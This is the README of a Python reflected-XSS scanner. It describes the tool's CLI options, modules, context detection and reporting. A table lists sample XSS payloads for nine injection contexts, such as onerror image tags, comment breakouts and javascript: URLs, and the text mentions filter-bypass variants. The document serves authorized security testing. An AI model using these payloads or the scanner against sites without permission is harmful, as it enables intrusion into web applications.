A Python-based Reflected XSS (Cross-Site Scripting) vulnerability scanner with context-aware payload generation.
- Context-Aware Payload Generation: Dynamically generates payloads based on injection position
- 9 Injection Contexts: TEXT_NODE, ATTRIBUTE_VALUE, ATTRIBUTE_NAME, TAG_NAME, COMMENT, JS_STRING, JS_TEMPLATE, JS_CODE, URL_PARAMETER
- Auto Context Detection: Automatically analyzes responses to determine injection context
- GET & POST Support: Scan both GET parameters and POST form/JSON data
- Multiple Output Formats: Terminal (colored), HTML, and JSON reports
- Parallel Scanning: Thread-based and async I/O support for faster scans
- Filter Bypass Techniques: Includes payloads for common filter evasion
- Customizable: Headers, cookies, timeouts, and SSL options
- Python 3.8+
- pip
# Clone the repository
git clone <repository-url>
cd python-project
# Create a virtual environment (recommended)
python -m venv venv
# Activate virtual environment
# On Windows:
venv\Scripts\activate
# On Linux/Mac:
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Scan a single parameter with GET request
python -m xss_scanner -u "http://example.com/search" -p query
# Scan multiple parameters
python -m xss_scanner -u "http://example.com/search" -p "query,filter,page"
# POST request
python -m xss_scanner -u "http://example.com/login" -p "username,password" -m POST
# Specify injection contexts to test
python -m xss_scanner -u "http://example.com/page" -p input -c attribute_name,attribute_value,text_node
# Disable auto context detection
python -m xss_scanner -u "http://example.com/page" -p input --no-auto-detect
# Custom headers and cookies
python -m xss_scanner -u "http://example.com/api" -p q \
-H "Authorization: Bearer token123" \
-H "X-Custom-Header: value" \
--cookie "session=abc123; user=admin"
# POST with JSON body
python -m xss_scanner -u "http://example.com/api" -p data -m POST --json -d "key=value"
# Parallel scanning with 10 threads
python -m xss_scanner -u "http://example.com/search" -p query -t 10
# Async scanning (requires aiohttp)
python -m xss_scanner -u "http://example.com/search" -p query --async
# Generate HTML report
python -m xss_scanner -u "http://example.com/search" -p query -o report.html -f html
# JSON report
python -m xss_scanner -u "http://example.com/search" -p query -o report.json -f json
Usage: python -m xss_scanner [OPTIONS]
Required:
-u, --url URL Target URL to scan
-p, --parameters PARAMS Comma-separated list of parameters to test
HTTP Options:
-m, --method METHOD HTTP method: GET or POST (default: GET)
-H, --header HEADER Custom header (can be used multiple times)
--cookie COOKIES Cookie string in "key=value; key2=value2" format
-d, --data DATA POST data in "key=value" format (can be repeated)
--json Send POST data as JSON
--timeout SECONDS Request timeout (default: 10)
--no-redirect Do not follow redirects
--insecure Skip SSL certificate verification
Scanning Options:
-c, --contexts CONTEXTS Comma-separated injection contexts to test
--no-auto-detect Disable automatic context detection
--no-bypass Disable filter bypass payloads
-t, --threads N Number of concurrent threads (default: 1)
--async Use async I/O for scanning
Output Options:
-o, --output FILE Output file path for the report
-f, --format FORMAT Report format: terminal, html, json
--no-color Disable colored terminal output
-q, --quiet Suppress progress output
-v, --verbose Enable verbose error output
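A subset of the options above could be wired up with `argparse` roughly as follows. This is a minimal sketch, not the project's actual `cli.py`: the function names `build_parser`, `parse_headers`, and `parse_cookies` and the attribute name `use_async` are assumptions made for illustration.

```python
import argparse
from typing import Dict, List


def build_parser() -> argparse.ArgumentParser:
    """Hypothetical parser covering a subset of the documented options."""
    parser = argparse.ArgumentParser(prog="xss_scanner")
    parser.add_argument("-u", "--url", required=True)
    parser.add_argument("-p", "--parameters", required=True)
    parser.add_argument("-m", "--method", choices=["GET", "POST"], default="GET")
    # action="append" allows -H to be given more than once.
    parser.add_argument("-H", "--header", action="append", default=[])
    parser.add_argument("--cookie", default="")
    parser.add_argument("--timeout", type=float, default=10)
    parser.add_argument("-t", "--threads", type=int, default=1)
    # "async" is a reserved word in Python, so the value is stored as use_async.
    parser.add_argument("--async", dest="use_async", action="store_true")
    return parser


def parse_headers(raw: List[str]) -> Dict[str, str]:
    """Turn ["Name: value", ...] into a header dictionary."""
    headers: Dict[str, str] = {}
    for item in raw:
        name, _, value = item.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def parse_cookies(raw: str) -> Dict[str, str]:
    """Turn "key=value; key2=value2" into a cookie dictionary."""
    cookies: Dict[str, str] = {}
    for pair in raw.split(";"):
        if "=" in pair:
            key, _, value = pair.partition("=")
            cookies[key.strip()] = value.strip()
    return cookies
```

Splitting the comma-separated `-p` value with `args.parameters.split(",")` then yields the list of parameters to test.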
xss_scanner/
├── __init__.py # Package initialization
├── __main__.py # Entry point for python -m
├── cli.py # Command-line interface
├── payload_generator.py # Context-aware payload generation
├── context_detector.py # Automatic context detection
├── scanner.py # Main scanning engine
└── report_generator.py # Report generation (HTML/terminal/JSON)
The PayloadGenerator class is the core of context-aware payload generation. It:
- Classifies injection contexts into 9 categories based on where user input appears in HTML/JS
- Generates targeted payloads for each context using breakout techniques appropriate to that position
- Includes filter bypass variants (case variation, whitespace tricks, separator manipulation)
How PayloadGenerator Chooses Payloads:
| Context | Strategy | Example Payload |
|---|---|---|
| `TEXT_NODE` | Inject complete HTML tags with event handlers | `<img src=x onerror="alert(1)">` |
| `ATTRIBUTE_VALUE` | Break out of quotes, inject new attributes/tags | `" onclick="alert(1)" x="` |
| `ATTRIBUTE_NAME` | Inject event handler as attribute | `onmouseover=alert(1)` |
| `TAG_NAME` | Create valid tags with handlers | `img src=x onerror=alert(1)` |
| `COMMENT` | Break out of comment | `--><script>alert(1)</script><!--` |
| `JS_STRING` | Break string, inject code | `";alert(1);//` |
| `JS_TEMPLATE` | Exploit template interpolation | `${alert(1)}` |
| `JS_CODE` | Direct code injection | `;alert(1);` |
| `URL_PARAMETER` | Use javascript: protocol | `javascript:alert(1)` |
Each payload includes:
- Value: The actual payload string
- Context: Which context it's designed for
- Description: Human-readable explanation
- Bypass Technique: (Optional) What filter bypass it uses
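The payload fields and the per-context lookup described above might be modeled as follows. This is a sketch under assumptions: the names `InjectionContext`, `Payload`, `BASE_PAYLOADS`, and `payloads_for` are illustrative and not confirmed to match `payload_generator.py`. The base payloads are the examples from the table; the single bypass variant is a hand-written illustration of case variation.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Dict, List, Optional


class InjectionContext(Enum):
    """The nine contexts listed in this README (names assumed)."""
    TEXT_NODE = "text_node"
    ATTRIBUTE_VALUE = "attribute_value"
    ATTRIBUTE_NAME = "attribute_name"
    TAG_NAME = "tag_name"
    COMMENT = "comment"
    JS_STRING = "js_string"
    JS_TEMPLATE = "js_template"
    JS_CODE = "js_code"
    URL_PARAMETER = "url_parameter"


@dataclass(frozen=True)
class Payload:
    value: str
    context: InjectionContext
    description: str
    bypass_technique: Optional[str] = None  # optional, as described above


# Example payloads copied from the table above.
BASE_PAYLOADS: Dict[InjectionContext, str] = {
    InjectionContext.TEXT_NODE: '<img src=x onerror="alert(1)">',
    InjectionContext.ATTRIBUTE_VALUE: '" onclick="alert(1)" x="',
    InjectionContext.ATTRIBUTE_NAME: "onmouseover=alert(1)",
    InjectionContext.TAG_NAME: "img src=x onerror=alert(1)",
    InjectionContext.COMMENT: "--><script>alert(1)</script><!--",
    InjectionContext.JS_STRING: '";alert(1);//',
    InjectionContext.JS_TEMPLATE: "${alert(1)}",
    InjectionContext.JS_CODE: ";alert(1);",
    InjectionContext.URL_PARAMETER: "javascript:alert(1)",
}


def payloads_for(context: InjectionContext, include_bypass: bool = True) -> List[Payload]:
    """Return the base payload for a context, plus an optional bypass variant."""
    result = [Payload(BASE_PAYLOADS[context], context, f"Base payload for {context.name}")]
    if include_bypass and context is InjectionContext.TEXT_NODE:
        # Illustrative case variation: HTML tag and attribute names are
        # case-insensitive, while the JavaScript inside must keep its case.
        result.append(Payload('<IMG SRC=x ONERROR="alert(1)">', context,
                              "Upper-case tag and attribute names", "case variation"))
    return result
```

Passing `include_bypass=False` mirrors what the `--no-bypass` flag is described as doing.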
The ContextDetector analyzes HTTP responses to determine where input is reflected:
- Pattern Matching: Uses regex patterns to identify surrounding HTML/JS syntax
- Heuristic Analysis: Falls back to heuristics when patterns don't match
- Confidence Scoring: Each detection includes a confidence score (0.0-1.0)
Detection triggers payload generation for only the relevant contexts, reducing noise.
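As a rough illustration of pattern matching with a heuristic fallback and confidence scores, consider the sketch below. The regexes, the confidence values, and the name `detect_contexts` are assumptions chosen for the example; the real `ContextDetector` may use different patterns and cover all nine contexts.

```python
import re
from typing import List, Tuple

# (context name, regex template, confidence). The token PROBE is replaced
# by the escaped probe value. Patterns and scores are illustrative only.
PATTERNS: List[Tuple[str, str, float]] = [
    ("COMMENT", r"<!--(?:(?!-->).)*PROBE", 0.9),
    ("JS_STRING", r"<script[^>]*>(?:(?!</script>).)*[\"'][^\"'\n]*PROBE", 0.8),
    ("ATTRIBUTE_VALUE", r"<[a-zA-Z][^<>]*=\s*[\"'][^\"'<>]*PROBE", 0.8),
]


def detect_contexts(body: str, probe: str) -> List[Tuple[str, float]]:
    """Return (context, confidence) pairs for a probe reflected in body."""
    if probe not in body:
        return []  # not reflected at all
    escaped = re.escape(probe)
    found: List[Tuple[str, float]] = []
    for name, template, confidence in PATTERNS:
        pattern = template.replace("PROBE", escaped)
        if re.search(pattern, body, re.IGNORECASE | re.DOTALL):
            found.append((name, confidence))
    if not found:
        # Heuristic fallback: reflected, but no pattern matched, so assume
        # plain text content with lower confidence.
        found.append(("TEXT_NODE", 0.5))
    return sorted(found, key=lambda item: item[1], reverse=True)
```

For example, `detect_contexts('<input value="xssprobe123">', "xssprobe123")` reports only `ATTRIBUTE_VALUE`, so only attribute-value payloads would need to be sent for that parameter.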
The main scanning engine:
- Context Probing: Sends probe values to detect reflection contexts
- Payload Selection: Gets appropriate payloads for detected contexts
- Request Execution: Sends payloads via GET/POST (sequential, threaded, or async)
- Reflection Detection: Uses substring matching to find reflected payloads
- Context Analysis: Analyzes the context of each reflection
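The request-execution and reflection-detection steps could look roughly like this for the threaded GET case. It is a sketch, not the code in `scanner.py`: `build_url`, `scan`, and `fake_fetch` are hypothetical names, and the HTTP call is passed in as a function so the example runs without network access.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlparse


def build_url(base_url: str, param: str, value: str) -> str:
    """Append one URL-encoded query parameter to base_url."""
    separator = "&" if "?" in base_url else "?"
    return f"{base_url}{separator}{urlencode({param: value})}"


def scan(base_url: str, params: List[str], payloads: List[str],
         fetch: Callable[[str], str], threads: int = 1) -> List[Dict[str, str]]:
    """Send every payload to every parameter and keep verbatim reflections."""
    jobs: List[Tuple[str, str]] = [(p, v) for p in params for v in payloads]

    def run(job: Tuple[str, str]) -> Optional[Dict[str, str]]:
        param, payload = job
        body = fetch(build_url(base_url, param, payload))
        # Substring matching: the payload must appear unmodified.
        if payload in body:
            return {"parameter": param, "payload": payload}
        return None

    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(run, jobs))  # map preserves job order
    return [r for r in results if r is not None]


def fake_fetch(url: str) -> str:
    """Stand-in for an HTTP client: echoes the 'query' parameter unescaped."""
    query = parse_qs(urlparse(url).query)
    return "<p>" + query.get("query", [""])[0] + "</p>"
```

Calling `scan("http://example.com/search", ["query", "page"], payloads, fake_fetch, threads=2)` reports a finding only for `query`, since the stand-in server reflects nothing else.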
Formats scan results into:
- Terminal: Colored ASCII output with statistics and findings
- HTML: Beautiful, responsive report with CSS styling
- JSON: Machine-readable format for integration
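A simplified view of the JSON and HTML outputs is sketched below. The `Finding` fields and the function names are assumptions for illustration, not the actual `report_generator.py` API. One point worth showing is that payloads written into an HTML report should be escaped, otherwise the report itself could render the injected markup.

```python
import html
import json
from dataclasses import asdict, dataclass
from typing import List


@dataclass
class Finding:
    # Hypothetical result record; the real report may carry more fields.
    parameter: str
    payload: str
    context: str


def to_json_report(target: str, findings: List[Finding]) -> str:
    """Serialize findings into a machine-readable JSON document."""
    report = {
        "target": target,
        "total_findings": len(findings),
        "findings": [asdict(f) for f in findings],
    }
    return json.dumps(report, indent=2)


def to_html_rows(findings: List[Finding]) -> str:
    """Render findings as table rows, escaping every value."""
    rows = []
    for f in findings:
        rows.append(
            "<tr><td>{}</td><td><code>{}</code></td><td>{}</td></tr>".format(
                html.escape(f.parameter), html.escape(f.payload), html.escape(f.context)
            )
        )
    return "\n".join(rows)
```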
The scanner uses substring matching to detect reflections:
reflected = payload_value in response_body
This approach was chosen for:
- Simplicity: Easy to understand and debug
- Reliability: Avoids missed matches caused by overly complex regex patterns (only verbatim reflections are matched)
- Speed: Fast string search operations
For each reflection found, the scanner performs context analysis to:
- Determine where in the HTML/JS the reflection occurs
- Assess whether the reflection is exploitable
- Provide detailed context in the report
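One simple way to combine the substring check with a basic exploitability signal is to distinguish a verbatim reflection from an HTML-entity-encoded one. The sketch below assumes a hypothetical helper named `classify_reflection`; it only recognizes the encoding produced by Python's `html.escape` and would miss other encodings.

```python
import html


def classify_reflection(payload: str, body: str) -> str:
    """Classify how a payload appears in a response body.

    Returns "raw" when the payload is reflected verbatim, "encoded" when
    only its HTML-entity-escaped form is present, and "absent" otherwise.
    """
    if payload in body:
        return "raw"  # same test as: reflected = payload_value in response_body
    # html.escape replaces &, <, > and (by default) both quote characters.
    if html.escape(payload) in body or html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"
```

A "raw" result is a candidate finding that still needs context analysis, while "encoded" suggests the application escapes output at that position.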
While more sophisticated approaches (DOM parsing, AST analysis) could provide better accuracy, substring matching offers:
- Lower complexity for the given scope
- Faster execution
- No dependencies on HTML parsers that may differ from browsers
- Easy to extend with additional checks
Rather than testing all payloads against all parameters, the scanner:
- Probes for context first
- Generates only relevant payloads
- Reduces scan time and false positives
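The probe-first idea can be sketched as two small helpers: one that creates a harmless, unlikely-to-collide probe value, and one that keeps only the payloads for the contexts detected with it. Both `make_probe` and `select_payloads` are hypothetical names, and the catalog layout (context name mapped to a list of payload strings) is an assumption.

```python
import secrets
from typing import Dict, List


def make_probe(prefix: str = "xssprobe") -> str:
    """Return an alphanumeric probe such as 'xssprobe1a2b3c4d'."""
    # token_hex(4) yields 8 random hex characters.
    return f"{prefix}{secrets.token_hex(4)}"


def select_payloads(detected: List[str], catalog: Dict[str, List[str]]) -> List[str]:
    """Keep only payloads for detected contexts, without duplicates."""
    selected: List[str] = []
    for context in detected:
        for payload in catalog.get(context, []):
            if payload not in selected:
                selected.append(payload)
    return selected
```

With a nine-context catalog and one detected context, a parameter receives only that context's payloads instead of the full set, which is where the reduction in requests comes from.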
Each component is independent and testable:
- `PayloadGenerator` can be used standalone for payload generation
- `ContextDetector` can analyze any HTML/JS content
- `ReportGenerator` can format any scan results
- Target Authorization: Users have authorization to scan the target
- HTTP/HTTPS Only: The scanner supports HTTP and HTTPS protocols
- Response Body: XSS reflections are detected in HTTP response bodies
- Single Request: Each payload is tested with one request (no multi-step exploitation)
- Browser Rendering: The scanner doesn't execute JavaScript; it detects reflection patterns
- No DOM-based XSS: Only detects reflected XSS, not DOM-based vulnerabilities
- No Stored XSS: Single-request model doesn't detect persistent XSS
- Simple Encoding Detection: Basic HTML entity detection, may miss complex encoding
- No WAF Detection: Doesn't specifically identify or bypass WAF solutions
- Type Hints: Full type annotations for IDE support and documentation
- Docstrings: All classes and methods documented
- Dataclasses: Clean data structures with `@dataclass`
- Enums: Type-safe context classification
- Error Handling: Graceful degradation on network errors
- Modular Design: Each component has single responsibility
Total development time: ~5 hours
- Architecture design: 30 minutes
- PayloadGenerator implementation: 45 minutes
- ContextDetector implementation: 30 minutes
- Scanner implementation: 60 minutes
- ReportGenerator implementation: 45 minutes
- CLI and integration: 30 minutes
- Documentation: 30 minutes
- Testing and refinement: 30 minutes
MIT License - See LICENSE file for details.
This tool is intended for authorized security testing only. Always obtain proper authorization before scanning any target. The authors are not responsible for misuse of this tool.